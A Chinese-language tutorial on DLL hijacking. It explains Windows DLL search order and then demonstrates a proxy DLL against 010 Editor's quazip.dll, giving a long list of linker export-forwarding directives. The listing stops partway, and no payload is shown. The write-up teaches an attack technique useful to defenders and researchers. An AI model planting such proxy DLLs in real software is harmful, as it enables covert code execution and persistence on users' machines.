DLL文件
在说dll劫持之前,我觉得有必要先说明一下dll文件的用途,dll文件是windows下的动态链接库文件,通常情况下,我们的应用程序并不是将所有的代码内容都生成为一个exe可执行文件的,开发者会将部分内容编译打包成一个后缀为.dll的库文件,这样做就我所知有三大好处:
- 应用程序本体体积会很小。
- 不同程序间可共享一个库文件。
- 可以增强程序的可扩展性。
介于这些好处,微软本身也是鼓励动态库文件的使用,当然,他也有一个缺点,那就是每次发布程序,都要讲这些dll文件打包与应用程序放在同一目录下发布,如果缺少dll文件,则这个程序将无法正常启动,而相对的就有了静态链接库.lib文件,lib文件会将其里面的内容一起编译进可执行文件中,使用在发布应用程序时,不将.lib文件打包进目录,该应用程序也是可以运行的。
DLL劫持
对于对渗透安全有了解的人肯定都听说过这个词,他就是利用动态链接库动态加载的特性来运行恶意代码。
然后,先来说说dll库的加载顺序,通常情况下,应用程序并不知道她所要加载的库文件所在的路径,他只知道库文件的名称,所以它在加载库文件时有一个墨守陈规的顺序
Windows查找DLL的目录以及对应的顺序:
windows xp sp2以前版本
- 进程对应的应用程序所在目录;
- 当前目录(Current Directory);
- 系统目录(通过 GetSystemDirectory 获取);
- 16位系统目录;
- Windows目录(通过 GetWindowsDirectory 获取);
- PATH环境变量中的各个目录;
windows xp sp2以后版本
微软在XP SP2之后,为了安全性添加了一个SafeDllSearchMode的注册表属性(HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager\SafeDllSearchMode),如果将此项开启(设为1),那路径将会变为:
- 进程对应的应用程序所在目录(可理解为程序安装目录比如C:\ProgramFiles\uTorrent)
- 系统目录(即%windir%system32);
- 16位系统目录(即%windir%system);
- Windows目录(即%windir%);
- 当前目录(运行的某个文件所在目录,通常情况下某个特定格式的文件会固定用某个软件打开,比如.docx文件默认用office或者WPS打开,要打开的文件在哪个路径,则那个打开这个文件的软件当前路径就在哪);
- PATH环境变量中的各个目录;
windows 7 以上版本
win7以上版本使用了KnownDLLs(可在注册表中查看)凡是此项下的DLL文件就会被禁止从exe自身所在的目录下调用,路径:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
所以win7以上版本想要对ws2_32等dll库进行劫持已经很难了,但是通常情况下,软件自身会带有很多自带的dll库,我们就可以从这些库进行入手。
这次我来对010Editor这个软件进行劫持演示,这是一个用来分析PE文件格式的程序,正常启动界面
然后我们来看看它的目录下大概有那些dll库
可用看到这个程序是基于Qt5开发的,现在我们想要找到其中一个dll库,然后编写一个与其同名的库来对这个库进行劫持,在劫持之前我们也应该想到,这些库中都提供了很多的函数,如果这些函数无法使用的话,那这个应用程序自然也就无法正常运行了,那如何解决这个问题?这里有很多方法,我在这演示最简单的函数转发的方法,就是在我们的dll库中将所有被劫持dll库中的函数进行转发,转发到那个被劫持的dll库中去,这样就不会影响到原程序的运行了。不过这种办法还是比较繁琐的,因为有些库中可能有成千上百个函数。。。
在确认要劫持哪个dll库之前,我们先用procexp查看这个应用程序都加载了哪些库,要说明的是,要先将我们要劫持的程序先运行起来,因为procexp查看的是进程。
除去系统库,还有Qt的库,而Qt的库,就像我说的里面的函数非常多,我实在是。。。写不起,所有在这我劫持一个叫quazip的库,这个库中的函数相对少一点大概有213个函数
转发函数方法
#pragma comment(linker, "/EXPORT:[查找的函数名]=[函数实现所在的DLL模块].[实际导出的函数名],@序号")
s然后还要说明一下DllMain函数
BOOL APIENTRY DllMain
(
HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
- hModule参数:指向DLL本身的实例句柄;
- lpReserved参数:为0表示隐式载入,1表示显式载入
- ul_reason_for_call参数:指明了DLL被调用的原因,可以有以下4个取值:
DLL_PROCESS_ATTACH:
当DLL被进程 第一次 调用时,导致DllMain函数被调用,
同时ul_reason_for_call的值为DLL_PROCESS_ATTACH,
如果同一个进程后来再次调用此DLL时,操作系统只会增加DLL的使用次数,不会再用DLL_PROCESS_ATTACH调用DLL的DllMain函数
DLL_PROCESS_DETACH:
当DLL被从进程的地址空间解除映射时,系统调用了它的DllMain,传递的ul_reason_for_call值是DLL_PROCESS_DETACH。
DLL_THREAD_ATTACH:
当进程创建一线程时,系统查看当前映射到进程地址空间中的所有DLL文件映像,
并用值DLL_THREAD_ATTACH调用DLL的DllMain函数。
新创建的线程负责执行这次的DLL的DllMain函数,
只有当所有的DLL都处理完这一通知后,系统才允许线程开始执行它的线程函数
DLL_THREAD_DETACH:
如果线程调用了ExitThread来结束线程(线程函数返回时,系统也会自动调用ExitThread),
系统查看当前映射到进程空间中的所有DLL文件映像,
并用DLL_THREAD_DETACH来调用DllMain函数,通知所有的DLL去执行线程级的清理工作。
s然后我们就可以写代码了,用CFF Explore来查看动态库都导出了哪些函数
注意,因为本人怕麻烦,直接将编译好的dll命名为quazip.dl然后复制到程序所在目录下,并且将原本的quazip.dll改名为quazip2.dll,在真正利用漏洞时过程虽然不同但道理是一样的
代码:
#include<Windows.h>
#pragma comment(linker,"/EXPORT:??0QuaAdler32@@QEAA@AEBV0@@Z=quazip2.??0QuaAdler32@@QEAA@AEBV0@@Z,@1")
#pragma comment(linker,"/EXPORT:??0QuaAdler32@@QEAA@XZ=quazip2.??0QuaAdler32@@QEAA@XZ,@2")
#pragma comment(linker,"/EXPORT:??0QuaChecksum32@@QEAA@AEBV0@@Z=quazip2.??0QuaChecksum32@@QEAA@AEBV0@@Z,@3")
#pragma comment(linker,"/EXPORT:??0QuaChecksum32@@QEAA@XZ=quazip2.??0QuaChecksum32@@QEAA@XZ,@4")
#pragma comment(linker,"/EXPORT:??0QuaCrc32@@QEAA@AEBV0@@Z=quazip2.??0QuaCrc32@@QEAA@AEBV0@@Z,@5")
#pragma comment(linker,"/EXPORT:??0QuaCrc32@@QEAA@XZ=quazip2.??0QuaCrc32@@QEAA@XZ,@6")
#pragma comment(linker,"/EXPORT:??0QuaGzipFile@@QEAA@AEBVQString@@PEAVQObject@@@Z=quazip2.??0QuaGzipFile@@QEAA@AEBVQString@@PEAVQObject@@@Z,@7")
#pragma comment(linker,"/EXPORT:??0QuaGzipFile@@QEAA@PEAVQObject@@@Z=quazip2.??0QuaGzipFile@@QEAA@PEAVQObject@@@Z,@8")
#pragma comment(linker,"/EXPORT:??0QuaGzipFile@@QEAA@XZ=quazip2.??0QuaGzipFile@@QEAA@XZ,@9")
#pragma comment(linker,"/EXPORT:??0QuaZIODevice@@QEAA@PEAVQIODevice@@PEAVQObject@@@Z=quazip2.??0QuaZIODevice@@QEAA@PEAVQIODevice@@PEAVQObject@@@Z,@10")
#pragma comment(linker,"/EXPORT:??0QuaZip@@QEAA@AEBVQString@@@Z=quazip2.??0QuaZip@@QEAA@AEBVQString@@@Z,@11")
#pragma comment(linker,"/EXPORT:??0QuaZip@@QEAA@PEAVQIODevice@@@Z=quazip2.??0QuaZip@@QEAA@PEAVQIODevice@@@Z,@12")
#pragma comment(linker,"/EXPORT:??0QuaZip@@QEAA@XZ=quazip2.??0QuaZip@@QEAA@XZ,@13")
#pragma comment(linker,"/EXPORT:??0QuaZipDir@@QEAA@AEBV0@@Z=quazip2.??0QuaZipDir@@QEAA@AEBV0@@Z,@14")
#pragma comment(linker,"/EXPORT:??0QuaZipDir@@QEAA@PEAVQuaZip@@AEBVQString@@@Z=quazip2.??0QuaZipDir@@QEAA@PEAVQuaZip@@AEBVQString@@@Z,@15")
#pragma comment(linker,"/EXPORT:??0QuaZipFile@@QEAA@AEBVQString@@0W4CaseSensitivity@QuaZip@@PEAVQObject@@@Z=quazip2.??0QuaZipFile@@QEAA@AEBVQString@@0W4CaseSensitivity@QuaZip@@PEAVQObject@@@Z,@16")
#pragma comment(linker,"/EXPORT:??0QuaZipFile@@QEAA@AEBVQString@@PEAVQObject@@@Z=quazip2.??0QuaZipFile@@QEAA@AEBVQString@@PEAVQObject@@@Z,@17")
#pragma comment(linker,"/EXPORT:??0QuaZipFile@@QEAA@PEAVQObject@@@Z=quazip2.??0QuaZipFile@@QEAA@PEAVQObject@@@Z,@18")
#pragma comment(linker,"/EXPORT:??0QuaZipFile@@QEAA@PEAVQuaZip@@PEAVQObject@@@Z=quazip2.??0QuaZipFile@@QEAA@PEAVQuaZip@@PEAVQObject@@@Z,@19")
#pragma comment(linker,"/EXPORT:??0QuaZipFile@@QEAA@XZ=quazip2.??0QuaZipFile@@QEAA@XZ,@20")
#pragma comment(linker,"/EXPORT:??0QuaZipFileInfo64@@QEAA@AEBU0@@Z=quazip2.??0QuaZipFileInfo64@@QEAA@AEBU0@@Z,@21")
#pragma comment(linker,"/EXPORT:??0QuaZipFileInfo@@QEAA@AEBU0@@Z=quazip2.??0QuaZipFileInfo@@QEAA@AEBU0@@Z,@22")
#pragma comment(linker,"/EXPORT:??0QuaZipFileInfo@@QEAA@XZ=quazip2.??0QuaZipFileInfo@@QEAA@XZ,@23")
#pragma comment(linker,"/EXPORT:??0QuaZipNewInfo@@QEAA@AEBU0@@Z=quazip2.??0QuaZipNewInfo@@QEAA@AEBU0@@Z,@24")
#pragma comment(linker,"/EXPORT:??0QuaZipNewInfo@@QEAA@AEBUQuaZipFileInfo64@@@Z=quazip2.??0QuaZipNewInfo@@QEAA@AEBUQuaZipFileInfo64@@@Z,@25")
#pragma comment(linker,"/EXPORT:??0QuaZipNewInfo@@QEAA@AEBUQuaZipFileInfo@@@Z=quazip2.??0QuaZipNewInfo@@QEAA@AEBUQuaZipFileInfo@@@Z,@26")
#pragma comment(linker,"/EXPORT:??0QuaZipNewInfo@@QEAA@AEBVQString@@0@Z=quazip2.??0QuaZipNewInfo@@QEAA@AEBVQString@@0@Z,@27")
#pragma comment(linker,"/EXPORT:??0QuaZipNewInfo@@QEAA@AEBVQString@@@Z=quazip2.??0QuaZipNewInfo@@QEAA@AEBVQString@@@Z,@28")
#pragma comment(linker,"/EXPORT:??1QuaGzipFile@@UEAA@XZ=quazip2.??1QuaGzipFile@@UEAA@XZ,@29")
#pragma comment(linker,"/EXPORT:??1QuaZIODevice@@UEAA@XZ=quazip2.??1QuaZIODevice@@UEAA@XZ,@30")
#pragma comment(linker,"/EXPORT:??1QuaZip@@QEAA@XZ=quazip2.??1QuaZip@@QEAA@XZ,@31")
#pragma comment(linker,"/EXPORT:??1QuaZipDir@@QEAA@XZ=quazip2.??1QuaZipDir@@QEAA@XZ,@32")
#pragma comment(linker,"/EXPORT:??1QuaZipFile@@UEAA@XZ=quazip2.??1QuaZipFile@@UEAA@XZ,@33")
#pragma comment(linker,"/EXPORT:??1QuaZipFileInfo64@@QEAA@XZ=quazip2.??1QuaZipFileInfo64@@QEAA@XZ,@34")
#pragma comment(linker,"/EXPORT:??1QuaZipFileInfo@@QEAA@XZ=quazip2.??1QuaZipFileInfo@@QEAA@XZ,@35")
#pragma comment(linker,"/EXPORT:??1QuaZipNewInfo@@QEAA@XZ=quazip2.??1QuaZipNewInfo@@QEAA@XZ,@36")
#pragma comment(linker,"/EXPORT:??4JlCompress@@QEAAAEAV0@AEBV0@@Z=quazip2.??4JlCompress@@QEAAAEAV0@AEBV0@@Z,@37")
#pragma comment(linker,"/EXPORT:??4QuaAdler32@@QEAAAEAV0@AEBV0@@Z=quazip2.??4QuaAdler32@@QEAAAEAV0@AEBV0@@Z,@38")
#pragma comment(linker,"/EXPORT:??4QuaChecksum32@@QEAAAEAV0@AEBV0@@Z=quazip2.??4QuaChecksum32@@QEAAAEAV0@AEBV0@@Z,@39")
#pragma comment(linker,"/EXPORT:??4QuaCrc32@@QEAAAEAV0@AEBV0@@Z=quazip2.??4QuaCrc32@@QEAAAEAV0@AEBV0@@Z,@40")
#pragma comment(linker,"/EXPORT:??4QuaZipDir@@QEAAAEAV0@AEBV0@@Z=quazip2.??4QuaZipDir@@QEAAAEAV0@AEBV0@@Z,@41")
#pragma comment(linker,"/EXPORT:??4QuaZipFileInfo64@@QEAAAEAU0@AEBU0@@Z=quazip2.??4QuaZipFileInfo64@@QEAAAEAU0@AEBU0@@Z,@42")
#pragma comment(linker,"/EXPORT:??4QuaZipFileInfo@@QEAAAEAU0@AEBU0@@Z=quazip2.??4QuaZipFileInfo@@QEAAAEAU0@AEBU0@@Z,@43")
#pragma comment(linker,"/EXPORT:??4QuaZipNewInfo@@QEAAAEAU0@AEBU0@@Z=quazip2.??4QuaZipNewInfo@@QEAAAEAU0@AEBU0@@Z,@44")
#pragma comment(linker,"/EXPORT:??8QuaZipDir@@QEAA_NAEBV0@@Z=quazip2.??8QuaZipDir@@QEAA_NAEBV0@@Z,@45")
#pragma comment(linker,"/EXPORT:??9QuaZipDir@@QEAA_NAEBV0@@Z=quazip2.??9QuaZipDir@@QEAA_NAEBV0@@Z,@46")
#pragma comment(linker,"/EXPORT:??AQuaZipDir@@QEBA?AVQString@@H@Z=quazip2.??AQuaZipDir@@QEBA?AVQString@@H@Z,@47")
#pragma comment(linker,"/EXPORT:??_7QuaAdler32@@6B@=quazip2.??_7QuaAdler32@@6B@,@48")
#pragma comment(linker,"/EXPORT:??_7QuaChecksum32@@6B@=quazip2.??_7QuaChecksum32@@6B@,@49")
#pragma comment(linker,"/EXPORT:??_7QuaCrc32@@6B@=quazip2.??_7QuaCrc32@@6B@,@50")
#pragma comment(linker,"/EXPORT:??_7QuaGzipFile@@6B@=quazip2.??_7QuaGzipFile@@6B@,@51")
#pragma comment(linker,"/EXPORT:??_7QuaZIODevice@@6B@=quazip2.??_7QuaZIODevice@@6B@,@52")
#pragma comment(linker,"/EXPORT:??_7QuaZipFile@@6B@=quazip2.??_7QuaZipFile@@6B@,@53")
#pragma comment(linker,"/EXPORT:?atEnd@QuaZipFile@@UEBA_NXZ=quazip2.?atEnd@QuaZipFile@@UEBA_NXZ,@54")
#pragma comment(linker,"/EXPORT:?bytesAvailable@QuaZipFile@@UEBA_JXZ=quazip2.?bytesAvailable@QuaZipFile@@UEBA_JXZ,@55")
#pragma comment(linker,"/EXPORT:?calculate@QuaAdler32@@UEAAIAEBVQByteArray@@@Z=quazip2.?calculate@QuaAdler32@@UEAAIAEBVQByteArray@@@Z,@56")
#pragma comment(linker,"/EXPORT:?calculate@QuaCrc32@@UEAAIAEBVQByteArray@@@Z=quazip2.?calculate@QuaCrc32@@UEAAIAEBVQByteArray@@@Z,@57")
#pragma comment(linker,"/EXPORT:?caseSensitivity@QuaZipDir@@QEBA?AW4CaseSensitivity@QuaZip@@XZ=quazip2.?caseSensitivity@QuaZipDir@@QEBA?AW4CaseSensitivity@QuaZip@@XZ,@58")
#pragma comment(linker,"/EXPORT:?cd@QuaZipDir@@QEAA_NAEBVQString@@@Z=quazip2.?cd@QuaZipDir@@QEAA_NAEBVQString@@@Z,@59")
#pragma comment(linker,"/EXPORT:?cdUp@QuaZipDir@@QEAA_NXZ=quazip2.?cdUp@QuaZipDir@@QEAA_NXZ,@60")
#pragma comment(linker,"/EXPORT:?close@QuaGzipFile@@UEAAXXZ=quazip2.?close@QuaGzipFile@@UEAAXXZ,@61")
#pragma comment(linker,"/EXPORT:?close@QuaZIODevice@@UEAAXXZ=quazip2.?close@QuaZIODevice@@UEAAXXZ,@62")
#pragma comment(linker,"/EXPORT:?close@QuaZip@@QEAAXXZ=quazip2.?close@QuaZip@@QEAAXXZ,@63")
#pragma comment(linker,"/EXPORT:?close@QuaZipFile@@UEAAXXZ=quazip2.?close@QuaZipFile@@UEAAXXZ,@64")
#pragma comment(linker,"/EXPORT:?compressDir@JlCompress@@SA_NVQString@@0_N@Z=quazip2.?compressDir@JlCompress@@SA_NVQString@@0_N@Z,@65")
#pragma comment(linker,"/EXPORT:?compressFile@JlCompress@@CA_NPEAVQuaZip@@VQString@@1@Z=quazip2.?compressFile@JlCompress@@CA_NPEAVQuaZip@@VQString@@1@Z,@66")
#pragma comment(linker,"/EXPORT:?compressFile@JlCompress@@SA_NVQString@@0@Z=quazip2.?compressFile@JlCompress@@SA_NVQString@@0@Z,@67")
#pragma comment(linker,"/EXPORT:?compressFiles@JlCompress@@SA_NVQString@@VQStringList@@@Z=quazip2.?compressFiles@JlCompress@@SA_NVQString@@VQStringList@@@Z,@68")
#pragma comment(linker,"/EXPORT:?compressSubDir@JlCompress@@CA_NPEAVQuaZip@@VQString@@1_N@Z=quazip2.?compressSubDir@JlCompress@@CA_NPEAVQuaZip@@VQString@@1_N@Z,@69")
#pragma comment(linker,"/EXPORT:?convertCaseSensitivity@QuaZip@@SA?AW4CaseSensitivity@Qt@@W421@@Z=quazip2.?convertCaseSensitivity@QuaZip@@SA?AW4CaseSensitivity@Qt@@W421@@Z,@70")
#pragma comment(linker,"/EXPORT:?count@QuaZipDir@@QEBAIXZ=quazip2.?count@QuaZipDir@@QEBAIXZ,@71")
#pragma comment(linker,"/EXPORT:?csize@QuaZipFile@@QEBA_JXZ=quazip2.?csize@QuaZipFile@@QEBA_JXZ,@72")
#pragma comment(linker,"/EXPORT:?dirName@QuaZipDir@@QEBA?AVQString@@XZ=quazip2.?dirName@QuaZipDir@@QEBA?AVQString@@XZ,@73")
#pragma comment(linker,"/EXPORT:?entryInfoList64@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo64@@@@AEBVQStringList@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?entryInfoList64@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo64@@@@AEBVQStringList@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z,@74")
#pragma comment(linker,"/EXPORT:?entryInfoList64@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo64@@@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?entryInfoList64@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo64@@@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z,@75")
#pragma comment(linker,"/EXPORT:?entryInfoList@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo@@@@AEBVQStringList@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?entryInfoList@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo@@@@AEBVQStringList@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z,@76")
#pragma comment(linker,"/EXPORT:?entryInfoList@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo@@@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?entryInfoList@QuaZipDir@@QEBA?AV?$QList@UQuaZipFileInfo@@@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z,@77")
#pragma comment(linker,"/EXPORT:?entryList@QuaZipDir@@QEBA?AVQStringList@@AEBV2@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?entryList@QuaZipDir@@QEBA?AVQStringList@@AEBV2@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z,@78")
#pragma comment(linker,"/EXPORT:?entryList@QuaZipDir@@QEBA?AVQStringList@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z=quazip2.?entryList@QuaZipDir@@QEBA?AVQStringList@@V?$QFlags@W4Filter@QDir@@@@V?$QFlags@W4SortFlag@QDir@@@@@Z,@79")
#pragma comment(linker,"/EXPORT:?exists@QuaZipDir@@QEBA_NAEBVQString@@@Z=quazip2.?exists@QuaZipDir@@QEBA_NAEBVQString@@@Z,@80")
#pragma comment(linker,"/EXPORT:?exists@QuaZipDir@@QEBA_NXZ=quazip2.?exists@QuaZipDir@@QEBA_NXZ,@81")
#pragma comment(linker,"/EXPORT:?extractDir@JlCompress@@SA?AVQStringList@@VQString@@0@Z=quazip2.?extractDir@JlCompress@@SA?AVQStringList@@VQString@@0@Z,@82")
#pragma comment(linker,"/EXPORT:?extractFile@JlCompress@@CA_NPEAVQuaZip@@VQString@@1@Z=quazip2.?extractFile@JlCompress@@CA_NPEAVQuaZip@@VQString@@1@Z,@83")
#pragma comment(linker,"/EXPORT:?extractFile@JlCompress@@SA?AVQString@@V2@00@Z=quazip2.?extractFile@JlCompress@@SA?AVQString@@V2@00@Z,@84")
#pragma comment(linker,"/EXPORT:?extractFiles@JlCompress@@SA?AVQStringList@@VQString@@V2@0@Z=quazip2.?extractFiles@JlCompress@@SA?AVQStringList@@VQString@@V2@0@Z,@85")
#pragma comment(linker,"/EXPORT:?filePath@QuaZipDir@@QEBA?AVQString@@AEBV2@@Z=quazip2.?filePath@QuaZipDir@@QEBA?AVQString@@AEBV2@@Z,@86")
#pragma comment(linker,"/EXPORT:?filter@QuaZipDir@@QEAA?AV?$QFlags@W4Filter@QDir@@@@XZ=quazip2.?filter@QuaZipDir@@QEAA?AV?$QFlags@W4Filter@QDir@@@@XZ,@87")
#pragma comment(linker,"/EXPORT:?flush@QuaGzipFile@@UEAA_NXZ=quazip2.?flush@QuaGzipFile@@UEAA_NXZ,@88")
#pragma comment(linker,"/EXPORT:?flush@QuaZIODevice@@UEAA_NXZ=quazip2.?flush@QuaZIODevice@@UEAA_NXZ,@89")
#pragma comment(linker,"/EXPORT:?getActualFileName@QuaZipFile@@QEBA?AVQString@@XZ=quazip2.?getActualFileName@QuaZipFile@@QEBA?AVQString@@XZ,@90")
#pragma comment(linker,"/EXPORT:?getCaseSensitivity@QuaZipFile@@QEBA?AW4CaseSensitivity@QuaZip@@XZ=quazip2.?getCaseSensitivity@QuaZipFile@@QEBA?AW4CaseSensitivity@QuaZip@@XZ,@91")
#pragma comment(linker,"/EXPORT:?getComment@QuaZip@@QEBA?AVQString@@XZ=quazip2.?getComment@QuaZip@@QEBA?AVQString@@XZ,@92")
#pragma comment(linker,"/EXPORT:?getCommentCodec@QuaZip@@QEBAPEAVQTextCodec@@XZ=quazip2.?getCommentCodec@QuaZip@@QEBAPEAVQTextCodec@@XZ,@93")
#pragma comment(linker,"/EXPORT:?getCurrentFileInfo@QuaZip@@QEBA_NPEAUQuaZipFileInfo64@@@Z=quazip2.?getCurrentFileInfo@QuaZip@@QEBA_NPEAUQuaZipFileInfo64@@@Z,@94")
#pragma comment(linker,"/EXPORT:?getCurrentFileInfo@QuaZip@@QEBA_NPEAUQuaZipFileInfo@@@Z=quazip2.?getCurrentFileInfo@QuaZip@@QEBA_NPEAUQuaZipFileInfo@@@Z,@95")
#pragma comment(linker,"/EXPORT:?getCurrentFileName@QuaZip@@QEBA?AVQString@@XZ=quazip2.?getCurrentFileName@QuaZip@@QEBA?AVQString@@XZ,@96")
#pragma comment(linker,"/EXPORT:?getEntriesCount@QuaZip@@QEBAHXZ=quazip2.?getEntriesCount@QuaZip@@QEBAHXZ,@97")
#pragma comment(linker,"/EXPORT:?getFileInfo@QuaZipFile@@QEAA_NPEAUQuaZipFileInfo64@@@Z=quazip2.?getFileInfo@QuaZipFile@@QEAA_NPEAUQuaZipFileInfo64@@@Z,@98")
#pragma comment(linker,"/EXPORT:?getFileInfo@QuaZipFile@@QEAA_NPEAUQuaZipFileInfo@@@Z=quazip2.?getFileInfo@QuaZipFile@@QEAA_NPEAUQuaZipFileInfo@@@Z,@99")
#pragma comment(linker,"/EXPORT:?getFileInfoList64@QuaZip@@QEBA?AV?$QList@UQuaZipFileInfo64@@@@XZ=quazip2.?getFileInfoList64@QuaZip@@QEBA?AV?$QList@UQuaZipFileInfo64@@@@XZ,@100")
#pragma comment(linker,"/EXPORT:?getFileInfoList@QuaZip@@QEBA?AV?$QList@UQuaZipFileInfo@@@@XZ=quazip2.?getFileInfoList@QuaZip@@QEBA?AV?$QList@UQuaZipFileInfo@@@@XZ,@101")
#pragma comment(linker,"/EXPORT:?getFileList@JlCompress@@SA?AVQStringList@@VQString@@@Z=quazip2.?getFileList@JlCompress@@SA?AVQStringList@@VQString@@@Z,@102")
#pragma comment(linker,"/EXPORT:?getFileName@QuaGzipFile@@QEBA?AVQString@@XZ=quazip2.?getFileName@QuaGzipFile@@QEBA?AVQString@@XZ,@103")
#pragma comment(linker,"/EXPORT:?getFileName@QuaZipFile@@QEBA?AVQString@@XZ=quazip2.?getFileName@QuaZipFile@@QEBA?AVQString@@XZ,@104")
#pragma comment(linker,"/EXPORT:?getFileNameCodec@QuaZip@@QEBAPEAVQTextCodec@@XZ=quazip2.?getFileNameCodec@QuaZip@@QEBAPEAVQTextCodec@@XZ,@105")
#pragma comment(linker,"/EXPORT:?getFileNameList@QuaZip@@QEBA?AVQStringList@@XZ=quazip2.?getFileNameList@QuaZip@@QEBA?AVQStringList@@XZ,@106")
#pragma comment(linker,"/EXPORT:?getIoDevice@QuaZIODevice@@QEBAPEAVQIODevice@@XZ=quazip2.?getIoDevice@QuaZIODevice@@QEBAPEAVQIODevice@@XZ,@107")
#pragma comment(linker,"/EXPORT:?getIoDevice@QuaZip@@QEBAPEAVQIODevice@@XZ=quazip2.?getIoDevice@QuaZip@@QEBAPEAVQIODevice@@XZ,@108")
#pragma comment(linker,"/EXPORT:?getMode@QuaZip@@QEBA?AW4Mode@1@XZ=quazip2.?getMode@QuaZip@@QEBA?AW4Mode@1@XZ,@109")
#pragma comment(linker,"/EXPORT:?getNTFSaTime@QuaZipFileInfo64@@QEBA?AVQDateTime@@PEAH@Z=quazip2.?getNTFSaTime@QuaZipFileInfo64@@QEBA?AVQDateTime@@PEAH@Z,@110")
#pragma comment(linker,"/EXPORT:?getNTFScTime@QuaZipFileInfo64@@QEBA?AVQDateTime@@PEAH@Z=quazip2.?getNTFScTime@QuaZipFileInfo64@@QEBA?AVQDateTime@@PEAH@Z,@111")
#pragma comment(linker,"/EXPORT:?getNTFSmTime@QuaZipFileInfo64@@QEBA?AVQDateTime@@PEAH@Z=quazip2.?getNTFSmTime@QuaZipFileInfo64@@QEBA?AVQDateTime@@PEAH@Z,@112")
#pragma comment(linker,"/EXPORT:?getPermissions@QuaZipFileInfo64@@QEBA?AV?$QFlags@W4Permission@QFileDevice@@@@XZ=quazip2.?getPermissions@QuaZipFileInfo64@@QEBA?AV?$QFlags@W4Permission@QFileDevice@@@@XZ,@113")
#pragma comment(linker,"/EXPORT:?getPermissions@QuaZipFileInfo@@QEBA?AV?$QFlags@W4Permission@QFileDevice@@@@XZ=quazip2.?getPermissions@QuaZipFileInfo@@QEBA?AV?$QFlags@W4Permission@QFileDevice@@@@XZ,@114")
#pragma comment(linker,"/EXPORT:?getUnzFile@QuaZip@@QEAAPEAXXZ=quazip2.?getUnzFile@QuaZip@@QEAAPEAXXZ,@115")
#pragma comment(linker,"/EXPORT:?getZip@QuaZipFile@@QEBAPEAVQuaZip@@XZ=quazip2.?getZip@QuaZipFile@@QEBAPEAVQuaZip@@XZ,@116")
#pragma comment(linker,"/EXPORT:?getZipError@QuaZip@@QEBAHXZ=quazip2.?getZipError@QuaZip@@QEBAHXZ,@117")
#pragma comment(linker,"/EXPORT:?getZipError@QuaZipFile@@QEBAHXZ=quazip2.?getZipError@QuaZipFile@@QEBAHXZ,@118")
#pragma comment(linker,"/EXPORT:?getZipFile@QuaZip@@QEAAPEAXXZ=quazip2.?getZipFile@QuaZip@@QEAAPEAXXZ,@119")
#pragma comment(linker,"/EXPORT:?getZipName@QuaZip@@QEBA?AVQString@@XZ=quazip2.?getZipName@QuaZip@@QEBA?AVQString@@XZ,@120")
#pragma comment(linker,"/EXPORT:?getZipName@QuaZipFile@@QEBA?AVQString@@XZ=quazip2.?getZipName@QuaZipFile@@QEBA?AVQString@@XZ,@121")
#pragma comment(linker,"/EXPORT:?goToFirstFile@QuaZip@@QEAA_NXZ=quazip2.?goToFirstFile@QuaZip@@QEAA_NXZ,@122")
#pragma comment(linker,"/EXPORT:?goToNextFile@QuaZip@@QEAA_NXZ=quazip2.?goToNextFile@QuaZip@@QEAA_NXZ,@123")
#pragma comment(linker,"/EXPORT:?hasCurrentFile@QuaZip@@QEBA_NXZ=quazip2.?hasCurrentFile@QuaZip@@QEBA_NXZ,@124")
#pragma comment(linker,"/EXPORT:?isAutoClose@QuaZip@@QEBA_NXZ=quazip2.?isAutoClose@QuaZip@@QEBA_NXZ,@125")
#pragma comment(linker,"/EXPORT:?isDataDescriptorWritingEnabled@QuaZip@@QEBA_NXZ=quazip2.?isDataDescriptorWritingEnabled@QuaZip@@QEBA_NXZ,@126")
#pragma comment(linker,"/EXPORT:?isEncrypted@QuaZipFileInfo64@@QEBA_NXZ=quazip2.?isEncrypted@QuaZipFileInfo64@@QEBA_NXZ,@127")
#pragma comment(linker,"/EXPORT:?isOpen@QuaZip@@QEBA_NXZ=quazip2.?isOpen@QuaZip@@QEBA_NXZ,@128")
#pragma comment(linker,"/EXPORT:?isRaw@QuaZipFile@@QEBA_NXZ=quazip2.?isRaw@QuaZipFile@@QEBA_NXZ,@129")
#pragma comment(linker,"/EXPORT:?isRoot@QuaZipDir@@QEBA_NXZ=quazip2.?isRoot@QuaZipDir@@QEBA_NXZ,@130")
#pragma comment(linker,"/EXPORT:?isSequential@QuaGzipFile@@UEBA_NXZ=quazip2.?isSequential@QuaGzipFile@@UEBA_NXZ,@131")
#pragma comment(linker,"/EXPORT:?isSequential@QuaZIODevice@@UEBA_NXZ=quazip2.?isSequential@QuaZIODevice@@UEBA_NXZ,@132")
#pragma comment(linker,"/EXPORT:?isSequential@QuaZipFile@@UEBA_NXZ=quazip2.?isSequential@QuaZipFile@@UEBA_NXZ,@133")
#pragma comment(linker,"/EXPORT:?isZip64Enabled@QuaZip@@QEBA_NXZ=quazip2.?isZip64Enabled@QuaZip@@QEBA_NXZ,@134")
